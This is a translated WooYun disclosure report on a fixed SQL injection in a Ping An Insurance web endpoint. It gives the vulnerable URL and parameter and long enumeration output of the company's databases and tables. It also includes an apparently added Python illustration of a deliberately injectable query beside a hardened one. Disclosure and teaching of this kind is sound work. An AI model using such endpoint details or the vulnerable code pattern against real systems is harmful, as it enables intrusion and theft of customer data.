
Vulnerability summary

Defect ID: wooyun-2015-099733

Title: SQL injection in the cloud backend of an app on the Ping An main site

Affected vendor: Ping An Insurance (Group) Company of China, Ltd.

Author: Arthur

Submitted: 2015-03-06 00:30

Fixed: 2015-04-20 14:22

Published: 2015-04-20 14:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-06: Details sent to the vendor, awaiting vendor handling
2015-03-09: Vendor has confirmed; details disclosed to the vendor only
2015-03-19: Details disclosed to core white hats and domain experts
2015-03-29: Details disclosed to regular white hats
2015-04-08: Details disclosed to intern white hats
2015-04-20: Details disclosed to the public

Brief description:

Detailed description:

URL: http://www.pingan.com/cms-tmplt/portalJsonpController.do?callback=jsonp1&method=articleList&channelId=424&channelLevel=2&number=10&pageNumber=1&publishDate=&_=1425241672662
I forgot which parameter it was..
I think it was number

Proof of vulnerability:

available databases [12]:
[*] DBMGR
[*] DBQUA
[*] PA18ADMSDATA
[*] PA18CMSDATA
[*] PA18DATA
[*] PA18LOGTMP
[*] PA18TSDATA
[*] PA18WCMDATA
[*] PORTALDATA
[*] SYS
[*] SYSTEM
[*] TOAD
Database: PA18CMSDATA
[301 tables]
+--------------------------------+
| ACTIVE_GOHOME |
| ACTIVE_INFO |
| ACTIVE_NOHOME |
| ACTIVITY_ADMIN_INFO |
| ACTIVITY_MEMBER_LOG |
| ACTIVITY_PRIZE_ADMIN_INFO |
| ACTIVITY_PRIZE_PUBLISH_INFO |
| ACTIVITY_PUBLISH_INFO |
| ACTIVITY_USER |
| ACTIVITY_WHITE_LIST_ADMIN |
| ACTIVITY_WHITE_LIST_PUBLISH |
| ACTIVITY_WINNER_LIST |
| ACT_ANYDOOR14_SEND_MSG |
| ACT_WORLDCUP_AUGURST |
| ACT_WORLDCUP_AUGURSTAGE |
| ACT_WORLDCUP_AUGURTEAM |
| ACT_WORLDCUP_AUGURUSER |
| ACT_WORLDCUP_INTERESTANSWER |
| ACT_WORLDCUP_INTERESTQUESTION |
| ACT_WORLDCUP_TESTPRIZEUSER |
| ACT_WORLDCUP_USERANSWER |
| ALLOW |
| BFXR_ACTIVITY_INFO |
| BFXR_ADMIN_INFO |
| BFXR_AGENT_INFO |
| BFXR_AGENT_INFO_IMG |
| BFXR_AGENT_INFO_IMG_TEMP |
| BFXR_AGENT_INFO_RELEASE |
| BFXR_AUDITING_INFO |
| BFXR_CLIENT_DETAIL_INFO |
| BFXR_CLIENT_INFO |
| BFXR_DEPT_INFO_IMG |
| BFXR_REGION_HIBERARCHY_IMG |
| BFXR_REGION_INFO_IMG |
| BFXR_RELEASE_ANSWER_INFO |
| BFXR_SENSITIVE_INFO |
| BFXR_VOTE_INFO |
| BOARD |
| BOARDDEFINE |
| BOARDLINK |
| CDS_EXECUTION |
| CDS_RULE |
| CF_DATA_LOG |
| CF_TOSEND_INFO1 |
| CF_TOSEND_INFO2 |
| CF_TOSEND_INFO3 |
| CF_TOSEND_PIGEONHOLE |
| CF_TOSEND_STATE |
| CF_TOSEND_TRIM |
| CHANNELSCHEMA |
| CHANNELSCHEMA2 |
| CMS_ACL |
| CMS_ATTACH |
| CMS_BAIDU_LOTTERY_INFO |
| CMS_CHANNEL |
| CMS_CODE |
| CMS_COLUMN |
| CMS_CONTENT |
| CMS_CTRIP_LOTTERY_INFO |
| CMS_CTRIP_ORDER_INFO |
| CMS_DB_LOG |
| CMS_DB_REQ_LOG |
| CMS_ENDOWMENT_INSURANCE_IP |
| CMS_ENDOWMENT_INSURANCE_PLAYER |
| CMS_EXAM_PRECONTRACT_RECORD |
| CMS_EXAM_RECORD |
| CMS_FILEATTRIBUTE |
| CMS_LOTTERY_INFO |
| CMS_PAGES |
| CMS_WLT_POINTS_RECHARGE_LOG |
| CM_PRICE_PENSION_PUBLISH |
| CONTENTLOG |
| CONTENTPROPERTY |
| CONTENTSTATUS |
| CONTENTVERSION |
| CONTENTVIEW |
| COUPON_COUNT |
| CREDITCARD_WECHAT_THSH_INFO |
| CULTURE_SURVEY |
| CZNJJ_AWARD_INFO |
| CZNJJ_FUND_INFO |
| CZNJJ_USER_INFO |
| CZNJJ_VOTE_INFO |
| DBDEP_EXECUTION |
| DBDEP_LOG |
| DBDEP_SCAN |
| DBDEP_TASK |
| DBDEP_TASK_FIELD |
| DBSPIDER |
| DBSPIDEREXECUTION |
| DBSPIDERFIELD |
| DBSPIDERRECORD |
| DBSPIDERSCHEDULE |
| DELEGATE |
| DEP_EXECUTION |
| DEP_LOG |
| DEP_RECORD |
| DEP_SCAN |
| DEP_TASK |
| DIRDELEGATE |
| DOWNLOAD_MATERIAL |
| ELEMENT_ITEM |
| ELEMENT_TYPE |
| EMAIL_NOTE_INFO |
| EMAIL_NOTE_INFO_H |
| EMAIL_SEND_TASK |
| EMAIL_SEND_TASK_H |
| EXAM_CLINIC_RECORD |
| EX_VOTE |
| FAMILY_LETTER |
| FEE_RULE |
| FORM_CHANNEL |
| FORM_DEFINITION |
| FORM_FIELD |
| FORM_OLDVALUE |
| FORM_RULES |
| FORM_TASK |
| FORM_VALUE |
| GAME_USER_LOGIN |
| GW_ACT_SYS_ACTIVITY_TYPE |
| GW_ACT_SYS_BASEINFO_ACTTYPE |
| GW_ACT_SYS_BASE_INFO |
| GW_ACT_SYS_BASE_INFO_P |
| GW_ACT_SYS_CHOUJIANG_LOG |
| GW_ACT_SYS_CHOUJIANG_PRIZEINFO |
| GW_ACT_SYS_CHOUJIANG_WINNER |
| GW_ACT_SYS_CJ_PRIZEINFO_P |
| GW_ACT_SYS_TEMPLATE_CHOUJIANG |
| GW_ACT_SYS_TEMPLATE_CJ_P |
| HAIER_JCX_CUSTOMER_INFO |
| HUODONG_RECORD |
| IDMANAGER |
| IMAGEUPLOAD |
| IMGLIB |
| IMGLIBTYPE |
| INBOX |
| INFO_ARTICLE |
| INFO_ARTICLE_BACKUP |
| INFO_ARTICLE_CHANNEL |
| INFO_ARTICLE_DETAIL |
| INFO_ATTACHMENT |
| INFO_CHANNEL |
| INSURANCE_ANALYSIS |
| INSURANCE_JOB |
| ISSUE |
| ITJOB_APPLY_JOB |
| ITJOB_ATTACHMENT |
| ITJOB_JOB |
| ITJOB_JOB_SEEKER |
| IWCMS_LIZHILEITAI |
| JRCSB_REQUEST_TICKET_RECORD |
| KEYWORD |
| KEYWORDLINK |
| KEYWORDTYPE |
| KFJ_FINALS_USER_INFO |
| KFJ_FINALS_VOTE_INFO |
| KFJ_POSTERS_INFO |
| KFJ_SEND_SCORE_INFO |
| KFJ_USER_INFO |
| KFJ_USER_TIMES_COUNT |
| KFJ_VOLUNTEER_USER_INFO |
| KFJ_VOLUNTEER_VOTE_INFO |
| KFJ_VOTE_INFO |
| LCS_BRANCH_INFO |
| LCS_CUSTODYREGION_RELATIONSHIP |
| LCS_CUSTODY_TBL |
| LIFE_INSURANCE_OCCUPATION |
| LOCK_RESOURCE |
| LOCK_RESOURCE_HISTORY |
| LUCY_CONVERT_NOTE |
| LUCY_USER_AWARD |
| LUCY_USER_DETAIL |
| LUCY_USER_INFO |
| L_BOOKING_APPL_MAS |
| L_BOOKING_APPL_MAS_CITY |
| L_BOOKING_CALC_MAS |
| L_BOOKING_CITY |
| L_BOOKING_COUNTY |
| L_BOOKING_DETAIL_MAS |
| L_BOOKING_INTRODUCER_INFO |
| L_BOOKING_PROVINCE |
| MAGAZINE |
| MARKET_USER_INFO |
| MARKET_VOTE_INFO |
| MATERIAL |
| MATERIAL_BRANCHS |
| MEDIA_SOURCE_CODE_INFO |
| MICROSITE |
| MICROSITECLUSTER |
| MOBILEPHONE_BRAND |
| MOBILEPHONE_CONSTANT |
| MOBILEPHONE_DOWNLOAD |
| MOBILEPHONE_MODEL |
| MOBILEPHONE_SERIES |
| MSG_TEMPLATE |
| NEWSPAPER |
| OC_APPROVAL_CHAIN |
| OC_APPROVAL_WORKFLOW |
| OC_WORKFLOW_TAST |
| ONEBAO_ACTIVITY_APPRAISE |
| PA18_CC_TOA_INVITATION |
| PA18_CDN_ACCESSING_NOTE |
| PA18_GZXMFL_QUALIFY |
| PA18_QUEST_PRIZE |
| PA18_QUEST_PRIZE2 |
| PA18_QUEST_PRIZE2_BAK |
| PA18_QUEST_REFER |
| PA18_QUEST_REFER2 |
| PA18_QUEST_REFER2_BAK |
| PA18_QUEST_SETTING |
| PA18_QUEST_SETTING2 |
| PA18_QUEST_SETTING2_BAK |
| PA18_QUEST_WIN_LIST |
| PA18_QUEST_WIN_LIST2 |
| PA18_QUEST_WIN_LIST2_BAK |
| PA18_TEL_EMPLOYEE_INFO_NEW |
| PA18_TOA_REGISTER_LOG |
| PA18_TOKEN_SETTING |
| PAGE |
| PAGECOLUMN |
| PAGECONTENT |
| PAWEB_ZNQ_AUDITING_INFO |
| PAWEB_ZNQ_CLIENT_DETAIL |
| PAWEB_ZNQ_CLIENT_INFO |
| PAWEB_ZNQ_VOTE_DETAIL |
| PAWEB_ZNQ_VOTE_INFO |
| PAWEB_ZYRS_CLIENT_INFO |
| PAWEB_ZYRS_CLIENT_INFO_HT1 |
| PAWEB_ZYRS_CLIENT_INFO_HT2 |
| PAWEB_ZYRS_CLIENT_INFO_IP |
| PAWEB_ZYRS_MANAGE_INFO |
| PAWEB_ZYRS_PREMIUM_INFO |
| PAWEB_ZYRS_RECOGNIZEE_INFO |
| PA_COMMENT_RECORD |
| PA_COMMENT_SIFT_WORD |
| PA_DD_COUPON |
| PA_DD_MERCHANTS_COUPON |
| PA_JOB_CACHE_TAG |
| PA_PASH_YOUHUI_EXTERNAL |
| PA_PASH_YOUHUI_INFO |
| PREVIEWFIGURE |
| QRTZ_BLOB_TRIGGERS |
| QRTZ_CALENDARS |
| QRTZ_CRON_TRIGGERS |
| QRTZ_FIRED_TRIGGERS |
| QRTZ_JOB_DETAILS |
| QRTZ_JOB_LISTENERS |
| QRTZ_LOCKS |
| QRTZ_MSG_TB_RELATION |
| QRTZ_PAUSED_TRIGGER_GRPS |
| QRTZ_PROCESS_MSG |
| QRTZ_SCHEDULER_STATE |
| QRTZ_SIMPLE_TRIGGERS |
| QRTZ_TRIGGERS |
| QRTZ_TRIGGER_LISTENERS |
| RECYLE |
| REGION_CODE_RELATION |
| RELATIVEARTICLES |
| RELDEFINE |
| ROLES |
| SCHOOL_INFO |
| SCHOOL_JOIN_INFO |
| SEARCHMETADATA |
| SEARCH_CUSTOMERACTION |
| SEARCH_CUSTOMERACTION_H |
| SECKILL_INFO |
| SECKILL_RECORD |
| SEND_MSG_RECORD |
| SHORT_ADDRESS_OFFLINE |
| SHORT_ADDRESS_OFFLINE_H |
| SHORT_ADDRESS_ONLINE |
| SHORT_ADDRESS_ONLINE_H |
| SMS_FREQUENCY |
| SMS_NOTE_INFO |
| SMS_NOTE_INFO_H |
| SMS_RECEIVE_TASK |
| SMS_SEND_TASK |
| SMS_SEND_TASK_H |
| SPIDER_LOG |
| SUBJECT |
| SUBJECTCOLUMN |
| SUBJECTTYPE |
| SYSCONFIG |
| SYSLOG |
| SYSUSERGROUP |
| SYSUSER_GROUP |
| TOA_LOGIN_PARMS |
| USERMANAGER |
| USERROLE |
| USER_USERS |
| WEBSPIDER |
| WEBSPIDEREXECUTION |
| WEBSPIDERQUEUE |
| WEBSPIDERRECORD |
| WEBSPIDERSCHEDULE |
| WFSTEP |
| WFSTEPINSTANCE |
| WORKFLOW |
| WORKFLOW_EOA_TASK |
| YLX_2014_KFJ_TOUBAO_LIST |
| YLX_2014_KFJ_WINNER_LIST |
+--------------------------------+
Database: SYSTEM
+-------+---------+
| Table | Entries |
+-------+---------+
| HELP | 919 |
+-------+---------+
Database: SYS
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| STMT_AUDIT_OPTION_MAP | 270 |
| SYSTEM_PRIVILEGE_MAP | 208 |
| AUDIT_ACTIONS | 181 |
| TABLE_PRIVILEGE_MAP | 26 |
+-----------------------+---------+
Database: PORTALDATA
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| CM_PROPERTY | 1121516 |
| CM_NODE | 93529 |
| CM_PROPERTY_DEFINITION | 419 |
| CM_OBJECT_CLASS | 31 |
+------------------------+---------+
Database: PA18WCMDATA
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| CMS_ONLINE_RESOURCE_EXPAND | 1154122 |
| CMS_OFFLINE_RESOURCE_EXPAND | 1024432 |
| KEYWORD_RANK | 654264 |
| CMS_ONLINE_RESOURCE_PROPS | 155075 |
| CMS_OFFLINE_RESOURCE_PROPS | 104180 |
| PAWEB_FUND_RESOURCE_EXPAND | 2175 |
| KEYWORD_LINK_LIBRARY | 1211 |
| PAWEB_FUND_RELATION | 804 |
| PAWEB_FUND_RESOURCE_PROPS | 750 |
| SEARCH_PAGEWEIGHT | 6 |
| CMS_ASYNC_LOAD_LIST | 5 |
| WARN_EMAIL | 4 |
+-----------------------------+---------+
Database: PA18TSDATA
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| IWCMS_DCR_EXT | 55597 |
| PA18_CMS_CONTENT | 19451 |
| CMS_KEYWORD | 6676 |
| IWCMS_DCR | 2417 |
| PA18_CMS_DCR | 834 |
| PA18_CMS_CONTENT_EXT | 579 |
| PA18_CMS_WAP | 318 |
| PA18_CMS_INFO | 63 |
| PA18_CMS_WAP_PROVINCE | 31 |
| PA18_CMS_WAP_COMPANY | 19 |
| PA18_CMS_SEQ_CONFIG_INFO | 5 |
| PA18_CMS_WAP_TYPE | 4 |
+--------------------------+---------+
Database: PA18LOGTMP
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| OC_ADR_BOOK_ID_TMP | 2 |
+--------------------+---------+
Database: DBMGR
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| STAT_ITL_WAITS | 304557 |
| UPD_PK_SQL_STATMENT | 22762 |
| DBA_MONITOR_LOG_DETAIL | 15800 |
+------------------------+---------+
Database: PA18DATA
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| LOTTERY_RECORD | 10824746 |
| USER_SATISF_SURVEY | 10763634 |
| BFXR_CUSTOMER_VISITS | 8258986 |
| PA18_LIFE_INSURANCE_FESTIVA | 3575994 |
| OC_CUST_SEND | 1475951 |
| PA18_CS_CASE_INFO | 712675 |
| PA18_CONTACT_US_INFO | 689959 |
| PA18_IB_USER | 229630 |
| PA18_IB_MAIN | 229629 |
| PA18_CREAITCARD_MAIL_INFO | 144419 |
| OC_CUST | 134217 |
| SERVE_MAMMON_SIGNIN | 90478 |
| PA18_TEL_EMPLOYEE_INFO | 67221 |
| OC_CUST_ORDER | 60292 |
| SERVE_MAMMON_CLIENT | 50980 |
| PA18_ENTERPRISE_ANNUITY | 41246 |
| LCYX_COUNTDEL | 12099 |
| BFXR_NOVOICE_SPEAK | 12009 |
| PA18_CONTACT_US_NO | 7635 |
| HEALTH_CN_MAIL | 6916 |
| LCYX_LOGIN_DETAIL | 3806 |
| BANK_ATM | 3366 |
| OC_EDM_TAG | 2765 |
| OC_MAG_MORE_TAG | 2193 |
| LCYX_USER | 1801 |
| PA18_NETWORKFINANCING | 1700 |
| PA18_BANK_FINANCING_INFO | 1035 |
| BANK_NETWORK | 594 |
| BANK_BRANCH | 546 |
| OC_MAG_FIELD | 436 |
| BFXR_CITY_ORG_MAPPING | 351 |
| CC_FIELD_DICT | 287 |
| OC_TABLE_TAG | 286 |
| OC_SEND_TASK | 257 |
| OC_MORE_TAG | 251 |
| BANK_DISTRICT | 245 |
| CC_USER | 177 |
| OC_MAG_INFO | 174 |
| OC_PAGE_TAG | 151 |
| OC_INFO | 118 |
| HEALTH_EN_MAIL | 116 |
| OC_MAGAZINE | 105 |
| CC_PERMISSION | 84 |
| LOTTERY_RULES | 74 |
| OC_FIELD_TAG | 56 |
| OC_INFO_TAG | 53 |
| BANK_CITY | 45 |
| SERVE_MAMMON_QUOTA | 38 |
| OC_ADR_BOOK | 23 |
| CC_FUNC_OPR | 22 |
| CC_OPR | 22 |
| OC_CUST_OPER_LOG | 18 |
| BANK_PROVINCE | 17 |
| OC_TABLE_TEMPLATE | 16 |
| OC_TEMPLATE | 16 |
| CC_GROUP | 9 |
| BANK_FOREIGN_EXCHANGE | 8 |
| OC_MAG_TYPE | 8 |
| OC_MAG_ADVERT | 6 |
| LCYX_JFLX | 4 |
| CC_TYPE | 3 |
| SERVE_MAMMON_RULE | 3 |
| OC_ADVERT_TAG | 2 |
| CC_FUNC | 1 |
| OC_UTIL | 1 |
+-----------------------------+---------+
Database: DBQUA
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| OUTLINE_OPER_HIST | 904172 |
| OUTLINE_HISTORY | 218 |
| CURRENT_OUTLINE | 1 |
+-------------------+---------+
Database: PA18ADMSDATA
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| DSP_ADMS_AUCTION_RESULT | 636 |
| DSP_ADMS_AUCTION_PROCESS | 359 |
| DSP_PURCHASER_USER_INFO | 81 |
| DSP_ADMS_AUCTION_INFO | 55 |
| DSP_DEPT_INFO | 45 |
| ADMS_PRODUCT_INFO | 25 |
| ADMS_ADVERT_LABEL_RELATION | 19 |
| ADMS_COMPANY_INFO | 16 |
| ADMS_LABEL_INFO | 12 |
| DSP_ADMIN_USER_INFO | 12 |
| DSP_AUCTION_NOTICE | 8 |
| DSP_AUCTION_CATEGORY | 2 |
| DSP_SYSTEM_CONFIG | 1 |
+----------------------------+---------+

Suggested fix:

The app server side also needs attention.
Especially this one: it is still on the main site, and having that many databases fully dumpable through injection is no small risk.

Copyright: when reposting, please credit the source Arthur@WooYun
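The report only names the endpoint and the injectable parameter (`number`, a page size for a paginated article list), so the following is an added illustration, not code from Ping An's portalJsonpController or from the report's author. It shows the defect pattern the finding implies (request parameters pasted into SQL text) next to a hardened handler that validates every numeric parameter as a bounded integer, binds values with placeholders, and whitelists the JSONP `callback` name. The table name `info_article` is taken from the INFO_ARTICLE entry in the sqlmap table listing above; its columns, the sample rows, and the use of in-memory sqlite3 with LIMIT/OFFSET in place of the Oracle backend are assumptions made to keep the example self-contained.

```python
import re
import sqlite3
from typing import List, Optional, Tuple

# Constructed sample rows standing in for the CMS article table.
SAMPLE_ARTICLES = [
    (1, 424, "Article A"),
    (2, 424, "Article B"),
    (3, 424, "Article C"),
    (4, 999, "Article in another channel"),
]

MAX_PAGE_SIZE = 100          # upper bound for the `number` parameter
MAX_PAGE_NUMBER = 1_000_000  # upper bound for `pageNumber`
MAX_CHANNEL_ID = 10 ** 9     # upper bound for `channelId`


def make_db() -> sqlite3.Connection:
    """Build an in-memory database (assumed schema, not Ping An's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE info_article (id INTEGER, channel_id INTEGER, title TEXT)"
    )
    conn.executemany("INSERT INTO info_article VALUES (?, ?, ?)", SAMPLE_ARTICLES)
    return conn


def article_list_vulnerable(conn: sqlite3.Connection, channel_id: str,
                            number: str, page_number: str
                            ) -> Tuple[str, List[tuple], Optional[str]]:
    """Defect pattern: raw request strings are concatenated into the SQL text,
    so whatever arrives in `number` is parsed as SQL rather than as a value.
    Returns (sql, rows, error_message) so callers can inspect what happened."""
    offset = f"({page_number} - 1) * {number}"
    sql = (
        "SELECT id, title FROM info_article "
        f"WHERE channel_id = {channel_id} "
        f"ORDER BY id LIMIT {number} OFFSET {offset}"
    )
    try:
        return sql, conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        # A non-numeric `number` reaches the SQL parser: proof that the
        # parameter is treated as code, not data.
        return sql, [], str(exc)


def parse_positive_int(raw: str, name: str, upper: int) -> int:
    """Accept only a plain decimal integer in [1, upper]; reject all else."""
    if not re.fullmatch(r"[1-9][0-9]*", raw):
        raise ValueError(f"{name} must be a positive integer")
    value = int(raw)
    if value > upper:
        raise ValueError(f"{name} exceeds {upper}")
    return value


def safe_callback(raw: str) -> str:
    """Whitelist the JSONP callback name so it cannot inject script text."""
    if not re.fullmatch(r"[A-Za-z_$][A-Za-z0-9_$]{0,63}", raw):
        raise ValueError("callback must be a plain identifier")
    return raw


def article_list_safe(conn: sqlite3.Connection, channel_id: str,
                      number: str, page_number: str) -> List[tuple]:
    """Hardened handler: strict typing of every numeric parameter plus a
    parameterized query, so user input never changes the SQL structure."""
    ch = parse_positive_int(channel_id, "channelId", MAX_CHANNEL_ID)
    size = parse_positive_int(number, "number", MAX_PAGE_SIZE)
    page = parse_positive_int(page_number, "pageNumber", MAX_PAGE_NUMBER)
    sql = (
        "SELECT id, title FROM info_article WHERE channel_id = ? "
        "ORDER BY id LIMIT ? OFFSET ?"
    )
    return conn.execute(sql, (ch, size, (page - 1) * size)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(article_list_safe(db, "424", "2", "1"))
    print(article_list_vulnerable(db, "424", "abc", "1")[2])
```

The bounds on `number` and `pageNumber` matter beyond injection: without them a legitimate-looking integer can still turn a pagination query into a full-table scan, which is the same availability exposure the report's large row counts hint at.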


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2015-03-09 11:08

Vendor reply:

The vulnerability has been fixed.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-03-09 11:54 | 明月影 ( Passer-by | Rank:12 Vulns:8 | Learning techniques, learning approaches.)

    Injection again, the five-point kind.

  2. 2015-03-09 12:46 | zeracker Certified white hat ( Core white hat | Rank:1068 Vulns:137 | More WooYun, more opportunities! WeChat public account: id:a301zls ...)

    Very fast fix!

  3. 2015-03-09 17:03 | Arthur ( Intern white hat | Rank:77 Vulns:33 | USA, I am coming!!!!!)

    Only 5 rank for an injection on the main site?? OMG! If I had known, I wouldn't have submitted it!

  4. 2015-03-09 21:25 | zeracker Certified white hat ( Core white hat | Rank:1068 Vulns:137 | More WooYun, more opportunities! WeChat public account: id:a301zls ...)

    @Arthur Go sign up for crowd testing. :) You know what I mean